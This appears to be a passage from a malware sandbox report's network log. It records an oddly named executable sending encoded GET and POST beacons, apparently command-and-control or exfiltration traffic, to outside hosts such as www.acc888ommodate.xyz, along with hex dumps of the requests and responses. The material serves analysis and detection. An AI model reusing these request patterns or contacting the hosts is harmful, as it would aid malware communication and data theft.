                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                  Nov 18, 2024 13:13:56.424381971 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                  Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.753164107.167.84.42803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:58.455259085 CET541OUTGET /g4fs/?0PIXBf9=3ndIaHiqeNA3nHGd8AHkXwlYF1OgixBFyjUlI87s5QAdbYlY5Sf7asAsxRx6tHqc14Nk2leX0TZcqtK/n28nLOTw2Vfuiiw8TGap3DrxCRua9Dp2yMpF4VwKHEspiCTWJ2CwkW3F1CDu&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.cssa.auction
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:13:59.085617065 CET1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 18 Nov 2024 12:13:58 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                  Nov 18, 2024 13:13:59.085654020 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                  Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.753165176.32.38.130803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:04.178936005 CET822OUTPOST /aqil/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.acc888ommodate.xyz
                                                                  Origin: http://www.acc888ommodate.xyz
                                                                  Referer: http://www.acc888ommodate.xyz/aqil/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 7a 58 59 49 48 48 6e 38 41 4c 55 67 2f 59 56 71 70 4e 53 68 6b 4e 32 41 58 37 4e 6c 33 34 48 37 36 51 78 2b 32 51 6e 36 36 58 31 4e 62 54 34 72 62 33 62 42 48 76 2b 42 75 74 2f 59 5a 77 46 6f 5a 4e 61 6d 48 68 59 6f 37 51 65 6a 34 67 48 6e 34 6b 7a 30 6d 46 4d 53 76 64 4d 76 47 73 55 48 4c 4b 68 48 5a 6e 54 75 50 6d 69 46 32 49 7a 6e 71 38 31 37 74 49 41 49 69 49 5a 47 61 73 78 6c 30 5a 6a 51 74 65 79 59 67 46 32 7a 77 47 54 66 67 4f 70 4e 51 6f 4e 6d 43 31 58 73 6e 38 31 45 63 64 70 59 49 42 79 6a 32 52 38 4c 75 45 68 41 6a 37 73 62 51 51 74 33 30 70 46 33 6c 48 36 72 63 75 62 65 2b 47 37 72 6e 69 31 70 66 61 33 58 38 77 3d 3d
                                                                  Data Ascii: 0PIXBf9=zXYIHHn8ALUg/YVqpNShkN2AX7Nl34H76Qx+2Qn66X1NbT4rb3bBHv+But/YZwFoZNamHhYo7Qej4gHn4kz0mFMSvdMvGsUHLKhHZnTuPmiF2Iznq817tIAIiIZGasxl0ZjQteyYgF2zwGTfgOpNQoNmC1Xsn81EcdpYIByj2R8LuEhAj7sbQQt30pF3lH6rcube+G7rni1pfa3X8w==
                                                                  Nov 18, 2024 13:14:05.087698936 CET691INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:04 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.753166176.32.38.130803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:07.044697046 CET842OUTPOST /aqil/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.acc888ommodate.xyz
                                                                  Origin: http://www.acc888ommodate.xyz
                                                                  Referer: http://www.acc888ommodate.xyz/aqil/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 7a 58 59 49 48 48 6e 38 41 4c 55 67 2b 35 6c 71 71 71 6d 68 73 4e 32 44 63 62 4e 6c 73 49 48 2f 36 51 74 2b 32 52 6a 54 37 6b 52 4e 61 78 67 72 61 32 62 42 4f 2f 2b 42 32 39 2f 58 55 51 46 6a 5a 4e 57 45 48 67 6b 6f 37 51 61 6a 34 6c 6a 6e 34 7a 50 7a 6e 56 4d 51 6b 39 4d 70 5a 63 55 48 4c 4b 68 48 5a 6e 48 45 50 6d 36 46 32 34 44 6e 73 64 31 34 68 6f 41 4c 68 49 5a 47 51 4d 78 66 30 5a 69 2f 74 64 32 6d 67 48 2b 7a 77 48 6a 66 6e 66 70 4f 46 59 4e 6b 4d 56 57 2b 33 4e 4e 4c 46 4e 4a 45 50 6e 43 74 77 69 67 61 6d 53 67 69 35 5a 67 33 4f 42 56 4d 77 72 68 42 79 68 6e 65 65 76 66 47 7a 6b 50 4b 34 56 51 44 53 49 57 54 71 50 31 6b 65 56 45 55 41 66 4d 34 47 59 46 42 63 35 54 58 73 39 77 3d
                                                                  Data Ascii: 0PIXBf9=zXYIHHn8ALUg+5lqqqmhsN2DcbNlsIH/6Qt+2RjT7kRNaxgra2bBO/+B29/XUQFjZNWEHgko7Qaj4ljn4zPznVMQk9MpZcUHLKhHZnHEPm6F24Dnsd14hoALhIZGQMxf0Zi/td2mgH+zwHjfnfpOFYNkMVW+3NNLFNJEPnCtwigamSgi5Zg3OBVMwrhByhneevfGzkPK4VQDSIWTqP1keVEUAfM4GYFBc5TXs9w=
                                                                  Nov 18, 2024 13:14:07.736435890 CET691INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:07 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.753167176.32.38.130803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:09.585781097 CET1855OUTPOST /aqil/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.acc888ommodate.xyz
                                                                  Origin: http://www.acc888ommodate.xyz
                                                                  Referer: http://www.acc888ommodate.xyz/aqil/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 7a 58 59 49 48 48 6e 38 41 4c 55 67 2b 35 6c 71 71 71 6d 68 73 4e 32 44 63 62 4e 6c 73 49 48 2f 36 51 74 2b 32 52 6a 54 37 6b 5a 4e 62 41 41 72 62 56 44 42 55 2f 2b 42 6f 74 2b 77 55 51 46 2b 5a 4e 2b 41 48 67 6f 57 37 53 53 6a 2b 47 62 6e 76 33 62 7a 74 56 4d 51 72 64 4d 6f 47 73 56 54 4c 4b 78 44 5a 6e 58 45 50 6d 36 46 32 37 62 6e 37 63 31 34 6e 6f 41 49 69 49 5a 53 61 73 77 52 30 5a 61 46 74 65 62 54 67 33 65 7a 7a 6e 7a 66 6c 74 52 4f 48 34 4e 63 42 31 58 37 33 4d 77 4c 46 4f 39 69 50 6a 4c 34 77 67 77 61 32 55 38 30 73 71 59 64 5a 6e 64 50 2f 70 6f 73 38 6a 6e 56 52 65 4f 2b 34 44 6e 46 34 6b 55 72 4a 71 79 73 6e 36 5a 69 4d 44 30 6a 4a 37 77 53 48 4f 55 57 4e 72 54 50 33 74 54 4b 4b 65 42 32 46 64 56 79 63 34 39 58 48 52 47 34 52 32 71 6a 53 41 58 68 30 7a 4f 6c 67 55 69 6c 74 4b 4d 63 4b 78 73 30 6d 53 54 55 6a 6c 46 2f 48 56 37 54 31 2f 58 53 2b 73 6b 46 4e 6f 35 45 6f 78 54 59 6c 44 61 78 71 43 4c 63 64 70 4d 77 70 6b 73 58 50 6e 75 57 66 77 4d 41 2b 71 51 2f 45 50 [TRUNCATED]
                                                                  Data Ascii: 0PIXBf9=zXYIHHn8ALUg+5lqqqmhsN2DcbNlsIH/6Qt+2RjT7kZNbAArbVDBU/+Bot+wUQF+ZN+AHgoW7SSj+Gbnv3bztVMQrdMoGsVTLKxDZnXEPm6F27bn7c14noAIiIZSaswR0ZaFtebTg3ezznzfltROH4NcB1X73MwLFO9iPjL4wgwa2U80sqYdZndP/pos8jnVReO+4DnF4kUrJqysn6ZiMD0jJ7wSHOUWNrTP3tTKKeB2FdVyc49XHRG4R2qjSAXh0zOlgUiltKMcKxs0mSTUjlF/HV7T1/XS+skFNo5EoxTYlDaxqCLcdpMwpksXPnuWfwMA+qQ/EPJkyfz4qQsQM1mdPKJ97frSJcUja/WTyxi3PT6E/H+LDo012XaAxUkVbkPqpORqWJj3nQLh0yx2NKlAJKqOXHb6njHQ2P8uJqXEH26lFY5szTz/nr0vESBS45L9B0ApjrLNEzEd859SDGoKQAgJF1tBEpCHowUkmnHqlFGRmG6rJRR5YwNLgE9sgg6aJnXYddqc2rbUa1JCVKSJN9tu16fplh6sw30Z9UqaU5Pp7f5pJpvICTMAdQY2Mv7RGjKK1M3WOuDO52Qv7Eybr+8xetj1ZUoA/5RTrJoHRqdTYilnPjra/Oyk5Gvm65Bz2cwzt8IM2I1yxfuBoISL+DkKKJZ/KDiqgD75Kqov8QXQwSKqxQwiQenmmUwZRmsWcGhd9D4F9i7D15H5Gjf8Gq1Hb7GJGi7tRVaoC5mzaEeqI5e0rvQfo2WJxEyCqnO2kkMUSpOFcJGXnXOY13qgZLhHdu1wYDlEYgQrxvzm3tp68rkCxsKBla78fXbxiIWleRn4vfuUUohrxpPCpd9MNBfE4f1p40qE/I8DavkeSizvNTH97wZ03kgjvU9RX/8Io83SMK2SwBB8TH5CIT4ImkgUDcAW1+VHqJpCIF/d0EHu9zvck9KoQ5L2beC46BfWj+7OzVeqg9e/SHouxPTpZJEulALblf3gBzfy7D26 [TRUNCATED]
                                                                  Nov 18, 2024 13:14:10.474663019 CET691INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:10 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.753168176.32.38.130803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:12.127274990 CET547OUTGET /aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqf HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.acc888ommodate.xyz
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:14:13.032849073 CET691INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:12 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.753169161.97.142.144803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:18.296999931 CET807OUTPOST /zffa/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.070002018.xyz
                                                                  Origin: http://www.070002018.xyz
                                                                  Referer: http://www.070002018.xyz/zffa/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
